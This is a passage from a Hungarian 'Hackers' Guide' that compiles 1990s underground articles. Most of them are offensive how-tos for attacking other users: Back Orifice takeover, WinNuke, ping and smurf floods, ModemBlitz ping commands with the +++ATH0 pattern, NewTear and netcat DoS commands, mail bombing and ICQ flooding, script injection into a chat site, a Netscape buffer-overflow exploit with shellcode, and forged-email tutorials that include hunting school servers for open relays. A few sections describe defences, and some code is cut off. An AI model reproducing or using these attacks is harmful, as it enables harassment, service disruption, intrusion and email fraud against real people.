tartozik! Bár a portscannerek kiírják a default ismertebb portokat www:80 / irc:6667 de ha mondjuk egy 31337 számú por van nyitva arra már nem bírsz lépni, hogy ez mégis mi a fenének a portja lehet. (Elárulom: BO default =)) Nos tegyük fel, hogy a portscanner talált egy nyitott portot pölö a 31337-est. No most ezt szépen megkeresed, hogy kinek a milye =). És lőn kiderúlt, hogy ez a Back Orifice portja. Ezekután már elfelejthetsz minden más módszert az illető buherálására, mert már a kezedben is tartod a rendszerét. Keresel egy BO klient, berod az IP-jét és csatlakozol. Ezek után bármit megcsínálhatsz vele amit ő megtud. (Mivel a BO erre lett kitalálva. =)) Lehetőleg NE törölj le semmit, inkább nézz körül a gépén hátha találsz valami érdekeset. Soha sem tudhatod, hogy milyen fontos dokumentumokat törölsz le, amik lehet, hogy téged is érdekelnének! =))) 5. Ha nem nyert a portscanner, akkor egyszerűen próbáld kilőni a 139-es porton keresztül. Ha nincs frissítve a rendszere (elég ritka manapság) akkor lekapcsolódik a netről, vagy csak kap egy "kékhalált" amin már csak a reset segít. =) 6. Mégegy piszkálásnak jó az ICMP smurf nevű kis apróság, vagy egy egyszerű ping flood amitől leszakad a gépe a netről.
202
Hackers’ Guide
7. Ha tudod az áldozat e-mail címét küldj neki egy levélbombát, vagy írasd fel egy halom levelező listára. 8. Ha fut az ICQ programja, akkor keress egy ICQ flooder-t és áraszd el üzenetekkel. Eredmény: meghal az ICQ-ja! =) 9. Keress egy port bombázót, és támadd a nyitott portjait (flood). Ez érdekes kihatással lesz az IRC-s és ICQ beli teevékenységére... =) 10. Ha csak egyszerűen meg akarod szakítani a net kapcsolatát akkor használd ki a modemblitz nevű progyt ami egy olyan spéci +++ath0 parancsot küldd amitől a modem bontja a kapcsolatot... =) 11. Az a legjobb ha az itt lert támadási módszerket egyszerre csínálod. Valószínű kissé ideges lesz a delikvens... =) A neten rengeteg programot találhatsz a fent említett módszerek végrehajtására. Csak a képzelőtehettségedre van bízva, hogy a fent említett trükköket milyen kombinációban használod. Eredeti: tH3 m4n!4c [email protected] - H3XR00T http://hexnet.hpage.net/
************************************************************************************************
És lőn sötétség a click után... A BBS-es időkből néhányan emlékezhetnek még az ATDT, ATH0 és egyéb modem parancsokra [Ehhh... Régi szép idők... Nem tudom, vajon a sok milliomos csemete akiknek egyszer csak az ölébe szakadt egy PIII, Korlátlan net-előfizetéssel azok tudják-e még, hogy mi az, hogy BBS, vagy FIDO, vagy ATM0 (hogy ne verjük fel az egész házat ugye... =)) Szerintem RENGETEGET vesztett az aki ezekből a dolgokból kimaradt. Nem volt annál jobb mikor egy BBS-en órákat beszéltem a Sysoppal a világ dolgairól, közben meg jött le egy 20 megás warez 14440-el...=) H3XR00T] - de ha mi emberek már elfeledkeztünk róluk, biztosan vannak még olyan lények, akik tudják mik ezek - s ezen lények nem mások mint a modemek. Ez a gondolat néhány hacker fejében is megfogant, s nemsokára megszületett a ModemBlitz néven közismert fegyver, amely a modemek egy egyszerű tévedését kihasználva megszakítja a kapcsolatot. A támadáshoz valójában nincs szükség külön erre specializálódott programra - a Linux PING parancsát is paraméterezhetjük úgy, hogy az áldozat modeme visszaküldéskor parancsnak értelmezze a packetet, s az ott megadottak szerint
203
Hackers’ Guide
cselekedjen ( ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx ). A fegyver gyorsan elterjedt, újabb örömteli perceket szerezve ezzel azon, magukat hackernek nevező tömegeknek, akik képesek ráclickelni a KILL gombra. Hogy is működik? Amikor megérkezik a ping a modembe, az feldolgozná... DE! mivel ECHO REQUESTED a Ping (vagyis válasz kellene rá =)) ezért vissza is indul, ahonnan jött. Na innen van a bibi. Mivel +++ jellel kezdődik ezért vezérlésnek veszi a modem, ezért végre hajtja: AT (Attention! vagyis parancs következik) h0 (hangup)... Dejá vu fog el ezen embereket látván: az egész kísértetiesen emlékeztet a pár évvel ezelötti WinNuke hadjáratra, amikoris a NetBios hibáját kiaknázva könnyedén kifagyasztható volt szinte minden Windowsos masina. Eleinte csak azok ismerték akik komolyabban foglalkoznak a "hálózati biztonságtechnikával", amikor azonban szélesebb körben elterjedt, emberek százai kattintgattak büszkén a WinNuke ikonra, hogy megmutassák nagyságukat a tudatlanabbanak. Az átlagos felhasználó ezidőben szentül hitte, hogy kilőhetetlen, ha egy programmal figyelteti a WinNuke által használt 139-es (vagy éppen 113-as) portot, s ugyanakkor annak is "tudatában volt", hogy minden program WinNuke, amivel meg lehet fosztani Windows-át a ténykedés édes pillanataitól. Nem kevés Matáv-szitkozódásnak állt valódi háttereként mostanában egy-egy ATH0 parancs - sokszor bármiféle indok nélkül, a gyilkolás felemelő érzéséért, vagy történetesen azon megalapozott ok miatt, hogy az áldozat nem volt hajlandó a fenyegetés ellenére sem OP-ot adni IRC-n. úgy látszik, az emberek többsége nem alkalmas arra, hogy olyan hatalommal bírjon, mely a modemesek 80%-át képes "elpusztítani". A ModemBlitz-el ezúttal könnyebb dolgunk van mint a WinNuke-al - annak ellenére, hogy gyakorlatilag sem tűzfal, sem egyéb védelmi rendszer nem véd meg tőle, ha egy ügyes támadóval állunk szemben. A védelemhez csupán le kell tiltanunk a +++ parancsokat, azaz a modem extra beállításaihoz (Sajátgép/Vezérlőpult/Modemek/Tulajdonságok/Kapcsolat/Egyebek/Extra beállítások) egy "S2=255"-öt kell írnunk. [Linux alatt: /etc/wvdial.conf - > az ATZ helyére s2=255 -öt kell írni!-H3XR00T] A következő csatlakozás után már sértetlenek vagyunk - nyugodtan hátradőlve élvezhetjük a netezést, s talán csak néha-néha fog el egy aggasztó gondolat: vajon azok, akik hatalmukkal nem telefonkapcsolatok, hanem az emberiség 80%-át képesek elpusztítani, mikor clickelnek a KILL gombra? Eredeti: ViDe0 [Kiegészítések: H3XR00T] - H3XR00T http://hexnet.hpage.net/
************************************************************************************************
204
Hackers’ Guide
A +++ath0 avagy a modemblitz Tudnunk kell, hogy ez a vonal megszakitasi modszer nem a modemblitz isteni aldasa. Barki elloheti linux alol vagy unix alol, vagy barmilyen ping-er segitsegevel, ami tartalmaz pattern lehetoseget (a kuldo hatarozza meg a csomag tartalmat). Egy rovid megjegyzes arrol, hogy mijaza Ping (nem sazkszoveg a kezdok kedveert, a tobbiek meg ugyis tuggyak). A ping egy olyan adatcsomag amely nevezheto akar halozati hanglokatornak is. Segitsegevel megvizsgahatunk cimeket, hogy elnek-e, mennyi a keses a kuldo es fogado kozott. Ezt az idot nevezhetjuk korbejarasi idonek is. A lenyeg az, hogy valasz erkezik a jelunkre. Ha gonoszkodni akarunk szegeny dialup-ossal (modemes gyengebbek kedveert), akkor a Ping-unket igy kuldhetjuk : ping -p 2b2b2b415448300d IP + + + A T H 0 ENTER (mindt tuggyuk... illene...) (IP helyere persze egy szam kell... >:) ) Lathato, hogy a szamunkra ugy ertekes +++ath0 ascii kodjanak megfelelo hexa erteket kap (nana' majd azt hitted mehet egybol a +++ath0 ???). Altalaban nem erdemes igy kuldenunk mert nagyon leterheli a kapcsolatunkat. Ezert erdemes megadni a csomagok szamat count-al. ping -c 5 -p 2b2b2b415448300d IP Ebben az esetben otszor fog kuldeni ping-et. Ez azert kell mert eltunhetnek adatcsomagok es meg fenn marad a celpont... :) Barmelyiket tesszuk is tok mind1. A lenyeg hogy elerjen a mi kis ajandekunk. Kerdes : Miert bont ? Mikor megerkezik az adat csomagunk (aminek felepiteset itt es most nem taglalom) akkor ugy beerkezik a modembe... onnan feldolgozasra keulne, de mivel ECHO REQUESTED a Ping ezert vissza is indul. Na itt kezdodik a baj. Berkezik a modemunkbe de mivel +++ jellel kezdodik ezert vezerlesnek tekinti amirol ugy gondolja, hogy buta op rendszerunktol jott. Ezert elkezdi vegre hajtani : az AT egy parancstipus a modemben. a h0 pedig a hangup-ot jelzi. Szal' pusztan ennyi. Itt most ugye kene egy kis halo ismeret, egy kis op rendszer ismeret, eegy kis hw ismeret, hogy ugyan akkor hogyan... De ezt talan majd kesobb... Hogyan is vedjuk ? Win alol eleg ecceru a dolog. Ecceruen beaalitod, hogy a modemed ne a +++ -t vegye vezerlesnek hanem valami mast. Ennek beallitasa Angol Win95/98 alatt: My computer -=> Dial-Up net -=> valamelyik connecten jobb klikk es properties -=> Connect using Configure -=> Connection -=> Advanced
205
Hackers’ Guide
-=> Extra settings-be ird be : s2=szam (szam egy 0 es 255 koze eso szam, lehetoleg ne 43 legyen... az az alap... :) ) Magyar Win95/98-t meg ne hasznaljatok ! De amugy ua. ... Sajat gep -=> Telefonos hal. -=> valamelyik connecten jobb klikk es tulajdonsagok -=> Kapcsolat Beallitas(?) -=> Kapcsolat -=> Advanced(?) -=> Extra beallitasok. Linux: /etc/wvdial.conf -=> az ATZ helyére hogy s2=255 Ez persze mind azert lett leirva, hogy ki tudjatok vedeni. NEM AZERT, hogy lojjetek ! Inkabb legyunk bekeben. Az a legjobb... LipIQe Ha kerdesed lenne: [email protected]
************************************************************************************************
NewTear A NewTear olyan csomagokat kuld a celgepre, melyeket az aztan nem tud osszerakni, es ebbe bizony beledoglik meg az SP4-es NT4Wks is... SP5 alatt nem lett tesztelve egyebkent. Termeszetesen csak linux alatt muxik... Erdemes egy masik virtualis terminalon ezt hasznalni ezzel parhuzamosan (csak linux alatt): ping -f IPCIM -s 8096 Egy tipikus tamadas: newtear FAKEIPCIM CELGEPIPCIM -n 20000 Ekkor 20000-szer kuldi el a cuccost, en minimum ennyivel nyomatom. Elviekben tehat az NT lazan kidumpol tole, nagy karokat lehet vele okozni, es ez nem reklamszoveg! Vedekezes: gumival, de jobb, ha a TCP/IP beallitasoknal nezunk korul, es az UDP-t csak meghatarozott portokon engedelyezzuk, eleg szivacs melo, jobb elerekni az NT-s halo ele egy jo routert, ami szuri a csomikat... En a Cisco 2620-ast tudom ajanlani, az a tuti. NewTear letöltése KohiNoor
206
Hackers’ Guide
************************************************************************************************
DoS Tamadasok fajtai by Lord Lsd FIGYELEM! Ennek a leirasnak a megertesehez kell nemi ismeret az internet mukodeserol, ugyhogy ha nem joban ezzel a Tmaval ne is folytasd az olvasast! Csapjunk a lovak koze: Bonk> Spoofolt udp csomagokat kuld. Eloidezhet ujraindulasokat is! Boink> A Bonk tovabbfejlesztett valtozata Teardrop> Kihasznalja a win95/NT hibajat. 2.0.32-nel alacsonyabb szintu Linux kernelnel is mukodik Newtear> A Teardrop masik valtozata Ping -f> A leghatasosap modszer az internet kapcsolat megszakitasara, de root jogunak kell lenned,hogy meg bird csinalni. Egyeb leirasokert, programokert nezd meg a rootshell.com-t!
************************************************************************************************
Internetto chat szivatás -=[Bevezetõ]=Egyik nap Fishbone osztálytársammal az sztech teremben üldögéltünk... ...már qurvára unatkoztam, amikor felhívta a figyelmem a www.internetto.hu/stb/presszo internetes chat oldalra... -=[Maga a lényeg]=Begépeltem és lõn-csoda, lõn-világosság bejött... ;] Szal' kb. 1 perce chateltunk amikor eszrevettem valamit a rendszerben. Hibának nem nevezném, mert ezeket a cgi-s chateket ugy gyártottak, hogy amit azt ugyanugy jeleníti meg tehat a <> közti szöveget értelmezi, tehát parancsnak tekinti és lefutatja... ;] -=[Tippek]=-
207
Hackers’ Guide
A következõ üzenet amit gépeltem: Megy???? ;] és még valami a java-s cuccokat is futtatja. Nos volt egy gondolat fosszfányom, méghozzá, hogy valószímûleg mindenki windowsból nyomja java tamogatással. Otthon elkeztem irogatni a javas cuccokat az estére. Az eredmény kb. 3 óra csend a presszóban. ;] Kb ilyen dolgokat irogattam este: <SCRIPT LANGUAGE="JavaScript">setTimeout("top.location.href = '/con/con'",1); Aki erti a java nyelvet annak világos a kód, aki meg nem az probalja ki... irja be egy *.htm filebe es nyissa meg. ;] Ezt a kódot egyébként a bizonyos freames bannerek kiírtására terveztem. Akkor a következõ trükköm az volt hogy fogtam és elmentettem az egész oldalt fogtam és a küldés gombra bármilyen linket rátettem és az elõzõ scriptet futtattam csak a /con/con helyett az oldal helye volt. Akkor ez is java: <script>while (1 != 2){self.parent.close()} ez is laza... ugyanebbol kiundúlva: <script>while (1 != 2){alert('www.rulezlinux.com')} A dolognak egyetlen "hibája" van, szóval a dolgokat csak akkor hajlando futtatni ha egy sorba irod, tehát nincs enter a kódban. A többit talaljátok ki! ;] -=[a Végére...]=Ez a text csak szemléltetés! ;] Special Thanx tO: fiShBonE bY: DomIni$ mailto: [email protected] www.rulezlinux.com #silver
************************************************************************************************
NUKING IS LAMEEE.... avagy ismertető a közelmúlt legismertebb háborúzó programjáról.
208
Hackers’ Guide
Mi az a NUKE ? Akkor beszélünk NUKE támadásról, ha valaki szándékosan ún. OOB (Out of Bands vagy Out of Bounds) adatokat küld neked. Ezeknek az adatoknak ez elküldésével, eléri, hogy összeomoljon a számítógéped és beálljon a híres kék halál. Windows 95 esetében valószínűleg valami hasonló jelenik meg: Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE. This was called from 0028: in VxD NDIS(01) + 00000D7C. Itt látszik, hogy a MSTCP-t és az NDIS-t hibáztatja. NT-n még nem láttam nagy halált, úgyhogy nem tudom mit ír ki, csak annyit tudok, hogy ott a TCPIP.SYS szerinte a hiba oka. Mi történik ha NUKE-olt valaki ? Mint már említettem, ha NUKE támadás ért, akkor hibaüzenetettel összeomlik a rendszer. A Windows 95 megszakítja a kapcsolatot, de nem biztos, hogy újra kell indítani a gépet (azért ajánlott). Az NT esetében - szinte - mindig újra kell indítani a gépet. Hogyan működik ? NT esetében: A küldő egy "Out of Band" adatot határoz meg, úgy, hogy egy ún. "urgent bit flag"-et (kb. sürgető bit flag) rak a TCP fejlécébe. Az adat fogadója az ún. "urgent pointer"-t (ezt inkább le sem fordítom, mert olyan hülyén hangzana) használja annak meghatározására, hogy az "urgent data" hol ér véget. A Windows NT-ben a bug az alábbi módon jelenik meg: ha az "urgent pointer" az adatszerkezet végére mutat és azt nem követi - számára - értelmes adat, akkor fagyi van. Az NT-nek "normális" adatokra lenne szüksége. Win95 esetében: Erről sajnos nincs megbítható információ, de annyi biztos, hogy nem tudja kezelni az OOB adatokat és emiatt van a hiba. Általában a NUKE-ot a 139-es porton szokták küldeni, ugyanis ez a port a leggyakrabban nyitott (Netbios - nbsession). Nemcsak a 139-es port támadható, hanem minden olyan port, ami nyitva van. (általában 53, 113, 139, 80) A nyitott portokról, portscannerek segítségével szerezhetsz információt. Ilyen portscannerek (is) találhatóak a http://w3.swi.hu/enfusia oldalán. Mikor vagyok támadható ?
209
Hackers’ Guide
1., Windows 95-öt használsz (összes verzió). 2., Windows NT 3.51-ed van. 3., Windows NT 4.0-ád van SP3 nélkül. 4., Windows 3.11-ed van. Hogyan tudom megvédeni magam ? 1., Win95 - vtcpupd.exe 2., WinNT 4.0 - SP2 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/ - SP3 - ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/ 3., Win 3.11 1., Baktass el a SYSTEM könyvtárba és keresd meg a system.ini file-t. 2., Ezt írd be közvetlenül az: [MSTCP] rész után: BSDUrgent=0 Frissítettem a rendszerfile-okat, de meg szeretném tudni, hogy védve vagyok-e. Ha mindenáron lövetni szeretnéd magad, akkor látogass el a http://www.yikes.com/nuke/ címre, ahol addig lövetheted magad, amíg akarod. Hogyan tudom megnézni, hogy ki támad ? Manapság már kismillió ilyen program van. Én személy szerint a Nukenabbert kedvelem, azért is, mert jelzi a portscannelést. Ha le akarod tölteni akkor ajánlom a http://w3.swi.hu/enfusia címet, ami kis kezem munkája (hááát igen minden "szentnek" maga felé hajlik a keze...). Sea-you [email protected]
************************************************************************************************
Win98 TCP/IP bug A Win98 TCP/IP - je az ICMP-Type13 (timestamp request) csomagoktol behal !! Ennek a kihasznalasara itt van egy kis program: #include <stdio.h> #include <stdlib.h> #include <string.h> #include #include #include <sys/socket.h> #include <sys/types.h>
210
Hackers’ Guide
#include #include #include #define __FAVOR_BSD #include #include #include <arpa/inet.h> #define IP_SIZE
sizeof( struct iphdr )
u_short in_cksum( u_short *addr, int len ) { int nleft = len; u_short *w = addr; int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while( nleft > 1 ) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *( u_char *)( &answer ) = *( u_char *)w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = ( sum >> 16 ) + ( sum & 0xffff ); /* add hi 16 to low 16 */ sum += ( sum >> 16 ); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return( answer ); }
int
211
Hackers’ Guide
send_icmp_packet( int sock_send, u_long src_addr, u_long dst_addr ) { char *packet, *cksum; /* packet, cksum */ int send_status, loop; struct struct struct struct
iphdr *ip; /* ip header */ icmp *icp; /* icmp header */ sockaddr_in from; /* sockaddr */ sockaddr_in to; /* sockaddr */
/************************************/ /* get and init packet_memory_area */ /************************************/ packet = ( char *)malloc( IP_SIZE + 20 ); ip = ( struct iphdr *)( packet ); icp = ( struct icmp *)( packet + IP_SIZE ); memset( packet, 0, IP_SIZE + 20 ); /****************/ /* IP header */ /****************/ ip->saddr = src_addr; ip->daddr = dst_addr; ip->version
Petycomp
************************************************************************************************
D.o.S-ra alkalmas bug a W'2000-ben Fordította:HSi Röviden: Szolgáltatás szüneteltetését lehet elérni különbözõ portok igénybevételével Windows 2000-es szerverekkel felszerelt hálózatokon. A támadások többségével 100%-os processzorterhelést lehet elõidézni egy Windows 2000-es szerveren Részletek: 212
Hackers’ Guide
A Windows 2000 különbözõ szolgáltatásai védtelenek egy egyszerû támadással szemben, melyekkel távoli felhasználok rövid idõn belül akár 100%-ra is felpörgethetik a szerver processzorát, ráadásul ezzel nem is terhelik meg nagyon saját gépüket. A hiba a következõ portok elérésekor jelentkezik: TCP portok közül: 7, 9, 21, 23, 7778 ; UDP portok közül: 53, 67, 68, 135, 137, 500, 1812, 1813, 2535, 3456. Amíg a célgép ki nem dõl, addig a processzor terheltsége jelentõsen emelkedik, egészen a 100%-ig. Linux alatt a hibát nagyon egyszerûen ki lehet használni a netcat programmal, ha a /dev/zero eszközt használjuk bemenetnek. Pl.: "nc target.host 7 < /dev/zero" a TCP portokra, míg az UDP portokra: "nc -u target.host 53 < /dev/zero" Mivel a hiba kihasználásával több szolgáltatás is elérhetetlenné válik viszonylag egyszerûen és rövid idõn belül, az egész disztribucióra nézve nagy veszélyt hordoz magában. Bõvebb információ: A hibát a SecureXpert jelentette. Eredeti szerzõ:SecureXpert Eredeti cím: New Denial of Service attacks on Windows 2000 Server
************************************************************************************************
Pirch'98 ident/fserve daemon DoS támadás Ez a cikk fordítás, az eredeti cikket írta: Chopsui-cide/MmM '00 - The Mad Midget Mafia - http://midgets.box.sk/ A Pirch98 IRC kliens le tud állni egy egyszeru túlcsordulás miatt, ha az fserve vagy az ident daemon aktív. A forráskód:pirch98.c Scalpal
************************************************************************************************
213
Hackers’ Guide
War FTP DoS (MKD/CWD) Ez a cikk fordítás, az eredeti cikket írta: Toshimi Makino [email protected] A War FTPd egy nagyon népszeru FTP server Windows 95-höz, 98-hoz és NT-hez. Egy új DoS támadást találtak a napokban a War FTPd server ellen. Ez az új támadás eléggé egyszeru, egy buffer túlcsordulásból áll, ami végbemegy, ha egy hosszú parancsot küldessz az FTP session alatt! A forráskód:warftpd-dos.c Scalpal
************************************************************************************************
Netscape Nav./Com. 4.5 buffer túlcsordulás Ez a cikk fordítás, az eredeti cikket írta: Steve [email protected] A buffer túlcsordulás a Netscape Navigatornál egy futtatható önhatalmú kódot használhat. Ez egy helyi támadás, ahol a bántó fél a felhasználó fájlja a "prefs.js", általában a c:\program files\netscape\users\***, ahol a felhasználó van. A túlcsordulás akkor fordul elo, amikor a Netscape Navigator által olvasott adat nagyobb, mint 80 bájt a network.proxy.http mezoben. Az exploit forráskódja:netsexp.txt Scalpal related to - Netscape Navigator/Communicator 4.5 By adding the following line to the preferences file of Netscape Navigator: user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"); Netscape Navigator crashes and can be caused to execute arbitrary code, compromising system security. Exploit:
214
Hackers’ Guide
<-snip-> /* Stack based buffer overflow exploit for Netscape Navigator 4.5 * Author Steve Fewer, 22-12-99. Mail me at [email protected] * * Netscape Navigator causes a buffer overflow when reading from * the users "prefs.js" file. If it reads a string longer than 80 * bytes in the user_pref("network.proxy.http", "proxy.com"); * field it smashes the stack overwrighting the EIP and EBP. This * can be used to execute arbitrary code. * * Tested with Netscape Navigator 4.5 using Windows98 on an Intel * PII 400 with 128MB RAM * * http://indigo.ie/~lmf */ #include #include int main() { printf("\n\n\t\t........................................\n"); printf("\t\t.....Netscape Navigator 4.5 exploit.....\n"); printf("\t\t........................................\n"); printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n"); printf("\t\t.........http://indigo.ie/~lmf..........\n"); printf("\t\t........................................\n"); printf("\t\t.....-==-......\n"); printf("\t\t......Magyar Nyelvu Hack Leirasok.......\n\n"); // the first 80 bytes. These get blown away when the stack goes down. char buff[96]; // the EBP, we don't need to use it so fill it with B's char ebp[8] = "BBBB"; // we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @ 7FD035EB char eip[8] = "\xEB\x35\xD0\x7F"; // the is our 'arbitrary code', it just runs a file app.exe from the \WINDOWS\COMMAND directory then calls exit() to clean up char sploit[128] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45 \xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8 \x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\ xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *file; for(int i=0;i
215
Hackers’ Guide
************************************************************************************************
Email
Fake Email Tartalom I. Fake Email II. Pelda I. Fake Email Valoszinuleg sok fake mailrol szolo dokut olvastatok mar, itt van meg egy. Ha nevtelenul szeretnel vkinek, vkiknek emailt kuldeni a legegyszerubb egy anonymous mail program hasznalata. Azonban ha a regi jol bevalt modszert akarod hasznalni akkor tessek. Az elso dolgod, hogy telnetelj be barmilyen UNIX alapu gep 25-os portjara. Az eredmeny valahogy igy fog kinezni: 220 dickheads.com ESMTP Sendmail 8.8.8/8.8.8/Debian/GNU; Fri, 9 Apr 1999 13 :24:06 +0200. Utana johet a HELP parancs: 214-This is Sendmail version 8.8.8 214-Topics: 214- HELO EHLO MAIL RCPT DATA 214- RSET NOOP QUIT HELP VRFY 214- EXPN VERB ETRN DSN 214-For more info use "HELP ". 214-To report bugs in the implementation send email to 214- [email protected]. 214-For local information send email to Postmaster at your site. 214 End of HELP info Ezutan beirod, hogy helo [IP vagy hostname]. Ha a helo nem mukodne akkor ehlo-t irj. Ezutan meg kell adni a sender nevet. Ez lehet barmi. Tehat irjuk:
216
Hackers’ Guide
mail from: CableBreakers Ezt kovetoen a cimzett kovetkezik, ide egy igazi mail cimet irjunk. rcpt to: [email protected] A kovetkezo lepes maga a level. A data parancs kiadasaval elkezdhetjuk irni a szoveget. Ha vegeztunk egy "." utan zarhatjuk a dolgot, majd quit. Ugye milyen egyszeru? >:) II. Pelda telnet clinton.monica.gov Trying xy... Connected to clinton.monica.gov. Escape character is '^]'. 220 clinton.monica.gov ESMTP Sendmail 8.9.3/8.8.8; Thu, 8 Apr 1999 13:33:35 +0200 helo clinton.monica.gov 250 clinton.monica.gov Hello [email protected] [666.666.666.666], pleased to meet you mail from: CableBreakers 250 CableBreakers... Sender ok rcpt to: [email protected] 250 [email protected]... Recipient ok data 354 Enter mail, end with "." on a line by itself Yippee! . 250 NAA29263 Message accepted for delivery quit 221 clinton.monica.gov closing connection Connection closed by foreign host. =====Cable Breakers=====================1999=========KerNel^Panic============= ==
************************************************************************************************
Hogyan küldjünk álcázott leveleket? (fakemail)
217
Hackers’ Guide
Most bemutatom, hogyan lehet úgy e-mailt küldeni, hogy nagyon nehezen lehessen minket visszanyomozni. Ehhez a telnet.exe nevű programot fogjuk használni, ami minden operációs rendszerben benne van. Indítsuk el: Start>Run, és írjuk be: telnet. Tegyünk egy kis kitérőt. A levelezés manapság az Interneten az SMTP (Simple Mail Transfer Protocol) szabályrendszerrel megy. Ez azt jelenti, hogy ha bizonyos szabályokat betartunk, akkor a világon bármely mailszerver el fogja fogadni a feladott levelünket. Most lépésről lépésre végigmegyünk a levél elküldésének mechanizmusán. Nem bonyolult. Az összes levelezőprogram (Outlook Express, Pegazus Mail stb.) ezt a protokollt használja, csak kiegészíti néhány extrával. A következő példában küldünk egy e-mailt a [email protected] címre, és úgy fogjuk álcázni a levelünket, hogy úgy tűnjön, mintha az [email protected] címről jött volna (ezek kitalált címek. Ahhoz, hogy a levél el is menjen, a címzettnek létezőnek kell lennie.) >>MS Windows 9x<< Tehát elindítottuk a telnet programot. A Connect menüből válasszuk a Remote System... menüpontot, a Host name mezőbe írjuk be: "mail.microsoft.com" (idézőjelek nélkül), a Port mezőbe pedig azt, hogy 25. (Az SMTP a 25-ös portot definiálja, mint mailportot. Az összes szabványos mailszerver ezen a porton működik. A host mezőbe pedig általában a címzett címének a kukac utáni része kerül, a "mail." előtaggal.) A többi mezőt hagyjuk, és kattintsunk a Connect-re. Ha jól írtunk be mindent, némi várakozás után az ablakban megjelenik a mailszerver üdvözlete.Üdvözöljük mi is: HELO localhost
(figyelj, egy L-lel. Ha nem működne, akkor írj "EHLO localhost" -ot)
A szerver hellozni fog és közli, hogy milyen címről loggoltak téged. A következő megadni a mi e-mail címünket (itt bármilyen hülyeséget megadhatunk, csak legyen a közepén @, és az utótagban legyen egy pont és valós domain-tartományra végződjön (tehát pl. .hu, .com, .net, .gov, .de, stb) MAIL FROM: [email protected] RCPT TO: [email protected] Ha minden rendben van, most következhet maga a levél szövege. DATA SUBJECT ide jön a levél tárgya utána az üzenet, annyi sorban, amennyi tetszik A szerver arról fogja felismerni, hogy befejeztük a levélírást, hogy egy új sorba egyetlen pontot teszünk, így: . QUIT Ezzel elküldtük a levelünket, és lezártuk a kapcsolatot a szerverrel. 218
Hackers’ Guide
Ez mind nagyon szép és jó. A címzett azt fogja látni, hogy a feladó e-mail címe [email protected] de ezzel még nem rejtettük el a nyomainkat. Minden levelezőprogramban van egy funkció, amellyel a levél összes fejlécét meg lehet nézni. Ezt a fejlécet a levél lezárása után a mailszerver illeszti a levélhez. Ebben a fejlécben többek között benne lesz az IP-címünk is, amelyről a szerverre bejelentkeztünk. Ez alapján még mindig visszanyomozhatóak vagyunk, tehát a mailszerverre történő bejelentkezés előtt menjünk keresztül egy proxyn (SOCKS vagy WinGate vagy egyéb), hogy megnehezítsük a visszakeresésünket. (Lásd a Proxyk című írást.) Léteznek olyan mailszerverek, amelyek hajlandóak továbbítani a levelünket egy másik mailszerverhez. Ezáltal az IP címünk nem fog megjelenni a címzettnél a levél fejlécében. Ha találunk ilyet, akkor a címzett mailszervere helyett ehhez csatlakozhatunk, a művelet többi része azonos a fent leírtakkal. Azonban ilyet nehéz találni. Leírok egy módszert, hogyan lehet ilyeneket keresni. Először is, ne katonai és ne kormányszervezeteknél próbálkozz, hanem oktatási intézményeknél: egyetemek, főiskolák, középiskolák hálózatain (kisebb az esélye, hogy lebuksz, és sok rendkívül rosszul konfigurált szerver van). Ehhez használj egy internetes keresőrendszert ( http://altavizsla.matav.hu/, http://heureka.net.hu/, stb.) és keress rá arra, hogy "egyetem" meg "főiskola" meg "középiskola" és próbáld megszerezni minél több iskolának a honlapcímét. Ha például találsz egy ilyet: http://www.egyetem.hu, akkor valószínűleg a mailszervere URL-je mail.egyetem.hu vagy www.egyetem.hu lesz. Csinálj egy hosszú listát, és telnettel nézd végig őket. Ha a mailszerver támogatja a továbbítást (routing) akkor az RCPT TO: blabla parancs kiadása után nem kapunk hibaüzenetet. Ha kapunk, akkor a mailszerver nem is fogja elküldeni a levelünket, hanem "Routing denied" vagy valami hasonló hibaüzenetet ad. Ekkor húzzuk ki a szervert a listából és próbálkozzunk a következővel :) Macerás dolog, és keveset fogunk találni (ha egyáltalán). Ne használjuk egy szervert ilyen célokra túl sokat, mert észreveszik és letiltják. Nem, nem adok mailszerver listát :) Keress magadnak, ahogy bárki más. Max. cserébe.. Voyager2
************************************************************************************************
Spoofed mail bombing by ReWtEr Itt van egy kis kibaszas arra az esetre hogyha iszonyu agressziv es nagyon gonosz emberek vagyunk es y0l ki akarunk szurni egy egy sot KETTO rencergizdaval, avagy hogy uszitsuk egymasra ket rendszer rendszergazdait akiket nem szeretunk ;)
219
Hackers’ Guide
